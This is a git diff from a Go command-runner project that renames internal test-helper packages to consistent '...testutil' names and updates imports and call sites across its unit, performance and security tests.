@@ -170,11 +170,11 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 		manager, err := NewDryRunResourceManager(mockExec, mockPriv, mockPathResolver, &DryRunOptions{})
 		require.NoError(t, err, "Failed to create DryRunResourceManager")
 
-		cmd := executortesting.CreateRuntimeCommand(
+		cmd := executortestutil.CreateRuntimeCommand(
 			"echo",
 			[]string{"test"},
-			executortesting.WithName("test_user_only"),
-			executortesting.WithRunAsUser("testuser"),
+			executortestutil.WithName("test_user_only"),
+			executortestutil.WithRunAsUser("testuser"),
 		)
 
 		group := &runnertypes.GroupSpec{
@@ -200,8 +200,8 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 	})
 
 	t.Run("no_user_group_specification", func(t *testing.T) {
-		mockExec := executortesting.NewMockExecutor()
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockExec := executortestutil.NewMockExecutor()
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 
 		mockPathResolver := &MockPathResolver{}
 		setupStandardCommandPaths(mockPathResolver)
@@ -209,10 +209,10 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 		manager, err := NewDryRunResourceManager(mockExec, mockPriv, mockPathResolver, &DryRunOptions{})
 		require.NoError(t, err, "Failed to create DryRunResourceManager")
 
-		cmd := executortesting.CreateRuntimeCommand(
+		cmd := executortestutil.CreateRuntimeCommand(
 			"echo",
 			[]string{"test"},
-			executortesting.WithName("test_no_user_group"),
+			executortestutil.WithName("test_no_user_group"),
 		)
 
 		group := &runnertypes.GroupSpec{

--- a/internal/runner/test_helpers.go
+++ b/internal/runner/test_helpers.go
@@ -11,12 +11,12 @@ import (
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource"
-	runnertesting "github.com/isseis/go-safe-cmd-runner/internal/runner/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/testutil"
 	"github.com/stretchr/testify/mock"
 )
 
 // MockResourceManager is an alias to the shared mock implementation
-type MockResourceManager = runnertesting.MockResourceManager
+type MockResourceManager = runnertestutil.MockResourceManager
 
 // MockGroupExecutor is a mock implementation of GroupExecutor for testing
 type MockGroupExecutor struct {

--- a/internal/runner/testutil/mocks.go
+++ b/internal/runner/testutil/mocks.go
@@ -1,8 +1,8 @@
 //go:build test
 
-// Package testutil provides shared test utilities and mock implementations
+// Package runnertestutil provides shared test utilities and mock implementations
 // for the runner package.
-package testutil
+package runnertestutil
 
 import (
 	"context"

--- a/internal/safefileio/testutil/mock.go
+++ b/internal/safefileio/testutil/mock.go
@@ -1,7 +1,7 @@
 //go:build test
 
-// Package testutil provides testing utilities for safefileio package.
-package testutil
+// Package safefileiotestutil provides testing utilities for safefileio package.
+package safefileiotestutil
 
 import (
 	"errors"

--- a/internal/security/elfanalyzer/analyzer_test.go
+++ b/internal/security/elfanalyzer/analyzer_test.go
@@ -10,7 +10,7 @@ import (
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
 	"github.com/isseis/go-safe-cmd-runner/internal/fileanalysis"
 	"github.com/isseis/go-safe-cmd-runner/internal/security/binaryanalyzer"
-	elfanalyzertesting "github.com/isseis/go-safe-cmd-runner/internal/security/elfanalyzer/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/security/elfanalyzer/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -261,7 +261,7 @@ func (m *mockSyscallAnalysisStore) LoadSyscallAnalysis(_ string, expectedHash st
 func TestStandardELFAnalyzer_SyscallLookup_NetworkDetected(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "static.elf")
-	elfanalyzertesting.CreateStaticELFFile(t, testFile)
+	elfanalyzertestutil.CreateStaticELFFile(t, testFile)
 
 	// Create mock store that returns network syscall result
 	mockStore := &mockSyscallAnalysisStore{
@@ -300,7 +300,7 @@ func TestStandardELFAnalyzer_SyscallLookup_NetworkDetected(t *testing.T) {
 func TestStandardELFAnalyzer_SyscallLookup_NoNetwork(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "static.elf")
-	elfanalyzertesting.CreateStaticELFFile(t, testFile)
+	elfanalyzertestutil.CreateStaticELFFile(t, testFile)
 
 	// Create mock store that returns non-network syscall result
 	mockStore := &mockSyscallAnalysisStore{
@@ -329,7 +329,7 @@ func TestStandardELFAnalyzer_SyscallLookup_NoNetwork(t *testing.T) {
 func TestStandardELFAnalyzer_SyscallLookup_HighRisk(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "static.elf")
-	elfanalyzertesting.CreateStaticELFFile(t, testFile)
+	elfanalyzertestutil.CreateStaticELFFile(t, testFile)
 
 	// Create mock store that returns high-risk result (unknown syscalls)
 	mockStore := &mockSyscallAnalysisStore{
@@ -361,7 +361,7 @@ func TestStandardELFAnalyzer_SyscallLookup_HighRisk(t *testing.T) {
 func TestStandardELFAnalyzer_SyscallLookup_HighRiskTakesPrecedenceOverNetwork(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "static.elf")
-	elfanalyzertesting.CreateStaticELFFile(t, testFile)
+	elfanalyzertestutil.CreateStaticELFFile(t, testFile)
 
 	// Create mock store that returns both network syscalls and high-risk (unknown syscalls).
 	// Risk must win: incomplete analysis makes the result unreliable regardless of
@@ -403,7 +403,7 @@ func TestStandardELFAnalyzer_SyscallLookup_HighRiskTakesPrecedenceOverNetwork(t 
 func TestStandardELFAnalyzer_SyscallLookup_NotFound(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "static.elf")
-	elfanalyzertesting.CreateStaticELFFile(t, testFile)
+	elfanalyzertestutil.CreateStaticELFFile(t, testFile)
 
 	// Create mock store that returns not found
 	mockStore := &mockSyscallAnalysisStore{
@@ -420,7 +420,7 @@ func TestStandardELFAnalyzer_SyscallLookup_NotFound(t *testing.T) {
 func TestStandardELFAnalyzer_SyscallLookup_HashMismatch(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "static.elf")
-	elfanalyzertesting.CreateStaticELFFile(t, testFile)
+	elfanalyzertestutil.CreateStaticELFFile(t, testFile)
 
 	// Create mock store that expects a specific hash
 	mockStore := &mockSyscallAnalysisStore{
@@ -445,7 +445,7 @@ func TestStandardELFAnalyzer_SyscallLookup_HashMismatch(t *testing.T) {
 func TestStandardELFAnalyzer_WithoutSyscallStore(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "static.elf")
-	elfanalyzertesting.CreateStaticELFFile(t, testFile)
+	elfanalyzertestutil.CreateStaticELFFile(t, testFile)
 
 	// Create analyzer without syscall store (nil)
 	analyzer := NewStandardELFAnalyzerWithSyscallStore(nil, nil)
@@ -465,7 +465,7 @@ func TestStandardELFAnalyzer_WithoutSyscallStore(t *testing.T) {
 func TestDynamicELF_SyscallFallback_NetworkDetected(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "dynamic.elf")
-	elfanalyzertesting.CreateDynamicELFFile(t, testFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, testFile)
 
 	// Store returns HasNetworkSyscalls=true (simulates CGO binary with socket syscall)
 	mockStore := &mockSyscallAnalysisStore{
@@ -494,7 +494,7 @@ func TestDynamicELF_SyscallFallback_NetworkDetected(t *testing.T) {
 func TestDynamicELF_SyscallFallback_NotRecorded(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "dynamic.elf")
-	elfanalyzertesting.CreateDynamicELFFile(t, testFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, testFile)
 
 	tests := []struct {
 		name   string
@@ -523,7 +523,7 @@ func TestDynamicELF_SyscallFallback_NotRecorded(t *testing.T) {
 func TestDynamicELF_SyscallFallback_HashMismatch(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "dynamic.elf")
-	elfanalyzertesting.CreateDynamicELFFile(t, testFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, testFile)
 
 	mockStore := &mockSyscallAnalysisStore{
 		result:       &SyscallAnalysisResult{},
@@ -543,7 +543,7 @@ func TestDynamicELF_SyscallFallback_HashMismatch(t *testing.T) {
 func TestDynamicELF_SyscallFallback_HighRisk(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "dynamic.elf")
-	elfanalyzertesting.CreateDynamicELFFile(t, testFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, testFile)
 
 	mockStore := &mockSyscallAnalysisStore{
 		result: &SyscallAnalysisResult{
@@ -569,7 +569,7 @@ func TestDynamicELF_SyscallFallback_HighRisk(t *testing.T) {
 func TestDynamicELF_WithoutSyscallStore(t *testing.T) {
 	tmpDir := tu.SafeTempDir(t)
 	testFile := filepath.Join(tmpDir, "dynamic.elf")
-	elfanalyzertesting.CreateDynamicELFFile(t, testFile)
+	elfanalyzertestutil.CreateDynamicELFFile(t, testFile)
 
 	// No syscall store: fallback disabled
 	analyzer := NewStandardELFAnalyzer(nil)
@@ -587,7 +587,7 @@ func TestCheckDynamicSymbols_NameBasedFilter(t *testing.T) {
 
 	t.Run("no-VERNEED binary importing socket yields NetworkDetected with socket category", func(t *testing.T) {
 		path := filepath.Join(tmpDir, "socket_only.elf")
-		elfanalyzertesting.CreateELFWithSymbols(t, path, []elfanalyzertesting.SymbolSpec{
+		elfanalyzertestutil.CreateELFWithSymbols(t, path, []elfanalyzertestutil.SymbolSpec{
 			{Name: "socket"},
 		})
 
@@ -607,7 +607,7 @@ func TestCheckDynamicSymbols_NameBasedFilter(t *testing.T) {
 
 	t.Run("no-VERNEED binary importing getaddrinfo yields NetworkDetected with dns category", func(t *testing.T) {
 		path := filepath.Join(tmpDir, "dns_only.elf")
-		elfanalyzertesting.CreateELFWithSymbols(t, path, []elfanalyzertesting.SymbolSpec{
+		elfanalyzertestutil.CreateELFWithSymbols(t, path, []elfanalyzertestutil.SymbolSpec{
 			{Name: "getaddrinfo"},
 		})
 
@@ -626,7 +626,7 @@ func TestCheckDynamicSymbols_NameBasedFilter(t *testing.T) {
 
 	t.Run("no-VERNEED binary importing only non-network symbols yields NoNetworkSymbols", func(t *testing.T) {
 		path := filepath.Join(tmpDir, "read_only.elf")
-		elfanalyzertesting.CreateELFWithSymbols(t, path, []elfanalyzertesting.SymbolSpec{
+		elfanalyzertestutil.CreateELFWithSymbols(t, path, []elfanalyzertestutil.SymbolSpec{
 			{Name: "read"},
 		})
 
@@ -638,7 +638,7 @@ func TestCheckDynamicSymbols_NameBasedFilter(t *testing.T) {
 
 	t.Run("no-VERNEED binary with mixed symbols records only networkSymbols matches", func(t *testing.T) {
 		path := filepath.Join(tmpDir, "mixed_symbols.elf")
-		elfanalyzertesting.CreateELFWithSymbols(t, path, []elfanalyzertesting.SymbolSpec{
+		elfanalyzertestutil.CreateELFWithSymbols(t, path, []elfanalyzertestutil.SymbolSpec{
 			{Name: "socket"},
 			{Name: "getaddrinfo"},
 			{Name: "pthread_create"}, // not in networkSymbols, must not be recorded
@@ -659,7 +659,7 @@ func TestCheckDynamicSymbols_NameBasedFilter(t *testing.T) {
 
 	t.Run("dlopen in no-VERNEED binary appears in DynamicLoadSymbols", func(t *testing.T) {
 		path := filepath.Join(tmpDir, "dlopen_socket.elf")
-		elfanalyzertesting.CreateELFWithSymbols(t, path, []elfanalyzertesting.SymbolSpec{
+		elfanalyzertestutil.CreateELFWithSymbols(t, path, []elfanalyzertestutil.SymbolSpec{
 			{Name: "dlopen"},
 			{Name: "socket"},
 		})

--- a/internal/security/elfanalyzer/testutil/helpers.go
+++ b/internal/security/elfanalyzer/testutil/helpers.go
@@ -1,7 +1,7 @@
 //go:build test
 
-// Package elfanalyzertesting provides test helpers for the elfanalyzer package.
-package elfanalyzertesting
+// Package elfanalyzertestutil provides test helpers for the elfanalyzer package.
+package elfanalyzertestutil
 
 import (
 	"bytes"

--- a/internal/testutil/helpers.go
+++ b/internal/testutil/helpers.go
@@ -1,7 +1,7 @@
 //go:build test || performance || integration
 
-// Package testutil provides shared helper functions for tests.
-package testutil
+// Package tu provides shared helper functions for tests.
+package tu
 
 import (
 	"os"

--- a/internal/verification/errors_test.go
+++ b/internal/verification/errors_test.go
@@ -5,7 +5,7 @@ import (
 	"testing"
 	"time"
 
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 )
@@ -145,7 +145,7 @@ func TestValidateProductionConstraints(t *testing.T) {
 func TestSecurityConstraintsInManager(t *testing.T) {
 	t.Run("production mode with strict security enforces constraints", func(t *testing.T) {
 		_, err := newManagerInternal("/custom/dir",
-			withFSInternal(commontesting.NewMockFileSystem()),
+			withFSInternal(commontestutil.NewMockFileSystem()),
 			withFileValidatorDisabledInternal(),
 			withCreationMode(CreationModeProduction),
 			withSecurityLevel(SecurityLevelStrict),
@@ -157,7 +157,7 @@ func TestSecurityConstraintsInManager(t *testing.T) {
 	})
 
 	t.Run("testing mode with relaxed security allows custom directories", func(t *testing.T) {
-		mockFS := commontesting.NewMockFileSystem()
+		mockFS := commontestutil.NewMockFileSystem()
 		mockFS.AddDir("/custom", 0o755)
 		mockFS.AddDir("/custom/dir", 0o755)
 

--- a/internal/verification/manager_test.go
+++ b/internal/verification/manager_test.go
@@ -12,7 +12,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/dynlib"
 	"github.com/isseis/go-safe-cmd-runner/internal/fileanalysis"
 	"github.com/isseis/go-safe-cmd-runner/internal/filevalidator"
@@ -106,7 +106,7 @@ func TestNewManager(t *testing.T) {
 
 	for _, tc := range testCases {
 		t.Run(tc.name, func(t *testing.T) {
-			mockFS := commontesting.NewMockFileSystem()
+			mockFS := commontestutil.NewMockFileSystem()
 
 			// Set up mock filesystem for valid directories
 			if tc.hashDir == testHashDir {
@@ -219,7 +219,7 @@ func TestManager_ValidateHashDirectory_RelativePath(t *testing.T) {
 	for _, tc := range testCases {
 		t.Run(tc.name, func(t *testing.T) {
 			// Create a mock filesystem with necessary directory structure
-			mockFS := commontesting.NewMockFileSystem()
+			mockFS := commontestutil.NewMockFileSystem()
 
 			// Create the directory in the mock filesystem to satisfy the security validator
 			if tc.hashDir != "" {
@@ -274,7 +274,7 @@ func TestNewManagerProduction(t *testing.T) {
 	t.Run("creates manager with default hash directory", func(t *testing.T) {
 		// We can't easily test the actual NewManager function due to filesystem requirements
 		// Instead, test the internal implementation with mocked filesystem
-		mockFS := commontesting.NewMockFileSystem()
+		mockFS := commontestutil.NewMockFileSystem()
 		err := mockFS.AddDir(testHashDir, 0o755)
 		require.NoError(t, err)
 
@@ -293,7 +293,7 @@ func TestNewManagerProduction(t *testing.T) {
 	t.Run("validates production constraints", func(t *testing.T) {
 		// Test that non-default directory is rejected in production mode
 		_, err := newManagerInternal("/custom/hash/dir",
-			withFSInternal(commontesting.NewMockFileSystem()),
+			withFSInternal(commontestutil.NewMockFileSystem()),
 			withFileValidatorDisabledInternal(),
 			withCreationMode(CreationModeProduction),
 			withSecurityLevel(SecurityLevelStrict),
@@ -403,7 +403,7 @@ func TestManager_ResolvePath_Integration(t *testing.T) {
 		// Test that our Manager correctly uses the hardcoded securePathEnv
 		// We can't easily test with the actual system paths, but we can verify
 		// that the Manager uses its pathResolver correctly
-		mockFS := commontesting.NewMockFileSystem()
+		mockFS := commontestutil.NewMockFileSystem()
 		require.NoError(t, mockFS.AddDir(testHashDir, 0o755))
 
 		manager, err := newManagerInternal(testHashDir,
@@ -1250,7 +1250,7 @@ func TestVerifyGlobalFiles_DryRun_MultipleFailures(t *testing.T) {
 	require.NoError(t, err)
 
 	// Set up mock filesystem with files but no hash files (both will fail verification)
-	mockFS := commontesting.NewMockFileSystem()
+	mockFS := commontestutil.NewMockFileSystem()
 	err = mockFS.AddDir(hashDir, 0o755)
 	require.NoError(t, err)
 	err = mockFS.AddFile(file1, 0o644, []byte("content1"))

--- a/internal/verification/testutil/helpers.go
+++ b/internal/verification/testutil/helpers.go
@@ -1,6 +1,6 @@
 //go:build test
 
-package verificationtesting
+package verificationtestutil
 
 import (
 	"github.com/isseis/go-safe-cmd-runner/internal/verification"
@@ -12,7 +12,7 @@ import (
 //
 // Usage:
 //
-//	mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group")).Return(...)
+//	mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group")).Return(...)
 func MatchRuntimeGroupWithName(expectedName string) any {
 	return mock.MatchedBy(func(input *verification.GroupVerificationInput) bool {
 		return input != nil && input.Name == expectedName

--- a/internal/verification/testutil/testify_mocks.go
+++ b/internal/verification/testutil/testify_mocks.go
@@ -1,7 +1,7 @@
 //go:build test
 
-// Package verificationtesting provides mock implementations for verification management testing.
-package verificationtesting
+// Package verificationtestutil provides mock implementations for verification management testing.
+package verificationtestutil
 
 import (
 	"github.com/isseis/go-safe-cmd-runner/internal/verification"

--- a/internal/verification/testutil/testify_mocks_test.go
+++ b/internal/verification/testutil/testify_mocks_test.go
@@ -1,17 +1,17 @@
-package verificationtesting_test
+package verificationtestutil_test
 
 import (
 	"errors"
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/verification"
-	verificationtesting "github.com/isseis/go-safe-cmd-runner/internal/verification/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/verification/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 )
 
 func TestMockManager_ResolvePath(t *testing.T) {
-	mockManager := new(verificationtesting.MockManager)
+	mockManager := new(verificationtestutil.MockManager)
 	expectedPath := "/usr/bin/test"
 	expectedErr := errors.New("resolution error")
 
@@ -25,7 +25,7 @@ func TestMockManager_ResolvePath(t *testing.T) {
 }
 
 func TestMockManager_VerifyGroupFiles(t *testing.T) {
-	mockManager := new(verificationtesting.MockManager)
+	mockManager := new(verificationtestutil.MockManager)
 	input := &verification.GroupVerificationInput{Name: "test-group"}
 	expectedResult := &verification.Result{TotalFiles: 1, VerifiedFiles: 1}
 	expectedErr := errors.New("verification error")
@@ -40,12 +40,12 @@ func TestMockManager_VerifyGroupFiles(t *testing.T) {
 }
 
 func TestMockManager_SuccessScenario(t *testing.T) {
-	mockManager := new(verificationtesting.MockManager)
+	mockManager := new(verificationtestutil.MockManager)
 	input := &verification.GroupVerificationInput{Name: "test-group"}
 	expectedResult := &verification.Result{TotalFiles: 1, VerifiedFiles: 1}
 
 	mockManager.On("ResolvePath", "test").Return("/usr/bin/test", nil)
-	mockManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group")).Return(expectedResult, nil)
+	mockManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group")).Return(expectedResult, nil)
 
 	path, err1 := mockManager.ResolvePath("test")
 	result, err2 := mockManager.VerifyGroupFiles(input)
@@ -60,7 +60,7 @@ func TestMockManager_SuccessScenario(t *testing.T) {
 }
 
 func TestMockManager_VerifyGroupFiles_NilResult(t *testing.T) {
-	mockManager := new(verificationtesting.MockManager)
+	mockManager := new(verificationtestutil.MockManager)
 	input := &verification.GroupVerificationInput{Name: "test-group"}
 	expectedErr := errors.New("verification failed")
 
@@ -74,7 +74,7 @@ func TestMockManager_VerifyGroupFiles_NilResult(t *testing.T) {
 }
 
 func TestMockManager_VerifyCommandDynLibDeps(t *testing.T) {
-	mockManager := new(verificationtesting.MockManager)
+	mockManager := new(verificationtestutil.MockManager)
 	expectedErr := errors.New("dynlib verification error")
 
 	mockManager.On("VerifyCommandDynLibDeps", "/usr/bin/test").Return(expectedErr)

--- a/test/performance/output_capture_test.go
+++ b/test/performance/output_capture_test.go
@@ -13,12 +13,12 @@ import (
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/output"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/privilege"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource"
-	resourcetesting "github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 
 	"github.com/stretchr/testify/require"
@@ -27,8 +27,8 @@ import (
 // Resolve commands to absolute paths once for all tests.
 // This is required because executor now expects absolute, symlink-resolved paths.
 var (
-	shCmd   = executortesting.ResolveCommand("sh")
-	echoCmd = executortesting.ResolveCommand("echo")
+	shCmd   = executortestutil.ResolveCommand("sh")
+	echoCmd = executortestutil.ResolveCommand("echo")
 )
 
 // TestLargeOutputMemoryUsage tests memory usage with large output
@@ -41,12 +41,12 @@ func TestLargeOutputMemoryUsage(t *testing.T) {
 	outputPath := filepath.Join(tempDir, "large_output.txt")
 
 	// Create test configuration
-	runtimeCmd := executortesting.CreateRuntimeCommand(
+	runtimeCmd := executortestutil.CreateRuntimeCommand(
 		shCmd,
 		[]string{"-c", "yes 'A' | head -c 10240"},
-		executortesting.WithName("large_output_test"),
-		executortesting.WithOutputFile(outputPath),
-		executortesting.WithRiskLevel("medium"),
+		executortestutil.WithName("large_output_test"),
+		executortestutil.WithOutputFile(outputPath),
+		executortestutil.WithRiskLevel("medium"),
 	)
 
 	groupSpec := &runnertypes.GroupSpec{Name: "test_group"}
@@ -63,7 +63,7 @@ func TestLargeOutputMemoryUsage(t *testing.T) {
 	runtime.ReadMemStats(&initialMem)
 
 	// Create resource manager and execute command
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 	ctx := context.Background()
 	_, result, err := manager.ExecuteCommand(ctx, runtimeCmd, groupSpec, map[string]string{})
 
@@ -118,12 +118,12 @@ func TestOutputSizeLimit(t *testing.T) {
 	outputPath := filepath.Join(tempDir, "size_limited_output.txt")
 
 	// Create command that generates more output than the limit
-	runtimeCmd := executortesting.CreateRuntimeCommand(
+	runtimeCmd := executortestutil.CreateRuntimeCommand(
 		shCmd,
 		[]string{"-c", "yes 'A' | head -c 2048"},
-		executortesting.WithName("size_limit_test"),
-		executortesting.WithOutputFile(outputPath),
-		executortesting.WithRiskLevel("medium"),
+		executortestutil.WithName("size_limit_test"),
+		executortestutil.WithOutputFile(outputPath),
+		executortestutil.WithRiskLevel("medium"),
 	)
 	// Set the output size limit on the command (1KB limit for 2KB data)
 	outputLimit, err := common.NewOutputSizeLimit(1024)
@@ -177,7 +177,7 @@ func TestConcurrentExecution(t *testing.T) {
 	// Create output capture manager
 	// For testing, we can use a simple mock SecurityValidator or skip output capture
 
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 
 	// Execute commands concurrently
 	results := make(chan error, numCommands)
@@ -185,11 +185,11 @@ func TestConcurrentExecution(t *testing.T) {
 
 	for i := range numCommands {
 		go func(index int) {
-			runtimeCmd := executortesting.CreateRuntimeCommand(
+			runtimeCmd := executortestutil.CreateRuntimeCommand(
 				echoCmd,
 				[]string{fmt.Sprintf("Output from command %d", index)},
-				executortesting.WithName(fmt.Sprintf("concurrent_test_%d", index)),
-				executortesting.WithOutputFile(filepath.Join(tempDir, fmt.Sprintf("output_%d.txt", index))),
+				executortestutil.WithName(fmt.Sprintf("concurrent_test_%d", index)),
+				executortestutil.WithOutputFile(filepath.Join(tempDir, fmt.Sprintf("output_%d.txt", index))),
 			)
 
 			groupSpec := &runnertypes.GroupSpec{Name: "test_group"}
@@ -237,13 +237,13 @@ func TestLongRunningStability(t *testing.T) {
 	outputPath := filepath.Join(tempDir, "long_running_output.txt")
 
 	// Create command that runs for a while and produces incremental output
-	runtimeCmd := executortesting.CreateRuntimeCommand(
+	runtimeCmd := executortestutil.CreateRuntimeCommand(
 		shCmd,
 		[]string{"-c", "for i in $(seq 1 10); do echo \"Line $i\"; sleep 0.1; done"},
-		executortesting.WithName("long_running_test"),
-		executortesting.WithOutputFile(outputPath),
-		executortesting.WithTimeout(tu.Int32Ptr(30)),
-		executortesting.WithRiskLevel("medium"),
+		executortestutil.WithName("long_running_test"),
+		executortestutil.WithOutputFile(outputPath),
+		executortestutil.WithTimeout(tu.Int32Ptr(30)),
+		executortestutil.WithRiskLevel("medium"),
 	)
 
 	groupSpec := &runnertypes.GroupSpec{Name: "test_group"}
@@ -257,7 +257,7 @@ func TestLongRunningStability(t *testing.T) {
 	// Create output capture manager
 	// For testing, we can use a simple mock SecurityValidator or skip output capture
 
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 
 	start := time.Now()
 	ctx := context.Background()
@@ -298,17 +298,17 @@ func BenchmarkOutputCapture(b *testing.B) {
 	privMgr := privilege.NewManager(slog.Default())
 	logger := slog.Default()
 
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 
 	// Small output benchmark
 	b.Run("SmallOutput", func(b *testing.B) {
 		for i := range b.N {
 			outputPath := filepath.Join(tempDir, fmt.Sprintf("small_output_%d.txt", i))
-			runtimeCmd := executortesting.CreateRuntimeCommand(
+			runtimeCmd := executortestutil.CreateRuntimeCommand(
 				echoCmd,
 				[]string{"small output"},
-				executortesting.WithName("small_output_bench"),
-				executortesting.WithOutputFile(outputPath),
+				executortestutil.WithName("small_output_bench"),
+				executortestutil.WithOutputFile(outputPath),
 			)
 
 			groupSpec := &runnertypes.GroupSpec{
@@ -328,11 +328,11 @@ func BenchmarkOutputCapture(b *testing.B) {
 		largeData := strings.Repeat("A", 100*1024) // 100KB
 		for i := range b.N {
 			outputPath := filepath.Join(tempDir, fmt.Sprintf("large_output_%d.txt", i))
-			runtimeCmd := executortesting.CreateRuntimeCommand(
+			runtimeCmd := executortestutil.CreateRuntimeCommand(
 				echoCmd,
 				[]string{largeData},
-				executortesting.WithName("large_output_bench"),
-				executortesting.WithOutputFile(outputPath),
+				executortestutil.WithName("large_output_bench"),
+				executortestutil.WithOutputFile(outputPath),
 			)
 
 			groupSpec := &runnertypes.GroupSpec{
@@ -368,16 +368,16 @@ func TestMemoryLeakDetection(t *testing.T) {
 	privMgr := privilege.NewManager(slog.Default())
 	logger := slog.Default()
 
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 
 	// Execute many commands to detect memory leaks
 	for i := range iterations {
 		outputPath := filepath.Join(tempDir, fmt.Sprintf("leak_test_%d.txt", i))
-		runtimeCmd := executortesting.CreateRuntimeCommand(
+		runtimeCmd := executortestutil.CreateRuntimeCommand(
 			echoCmd,
 			[]string{fmt.Sprintf("Test output %d", i)},
-			executortesting.WithName(fmt.Sprintf("leak_test_%d", i)),
-			executortesting.WithOutputFile(outputPath),
+			executortestutil.WithName(fmt.Sprintf("leak_test_%d", i)),
+			executortestutil.WithOutputFile(outputPath),
 		)
 
 		groupSpec := &runnertypes.GroupSpec{

--- a/test/security/output_security_test.go
+++ b/test/security/output_security_test.go
@@ -12,13 +12,13 @@ import (
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/output"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/privilege"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource"
-	resourcetesting "github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 
 	"github.com/stretchr/testify/require"
@@ -27,8 +27,8 @@ import (
 // Resolve commands to absolute paths once for all tests.
 // This is required because executor expects absolute paths (resolved by PathResolver in production).
 var (
-	echoCmd = executortesting.ResolveCommand("echo")
-	shCmd   = executortesting.ResolveCommand("sh")
+	echoCmd = executortestutil.ResolveCommand("echo")
+	shCmd   = executortestutil.ResolveCommand("sh")
 )
 
 // TestPathTraversalAttack tests protection against path traversal attacks
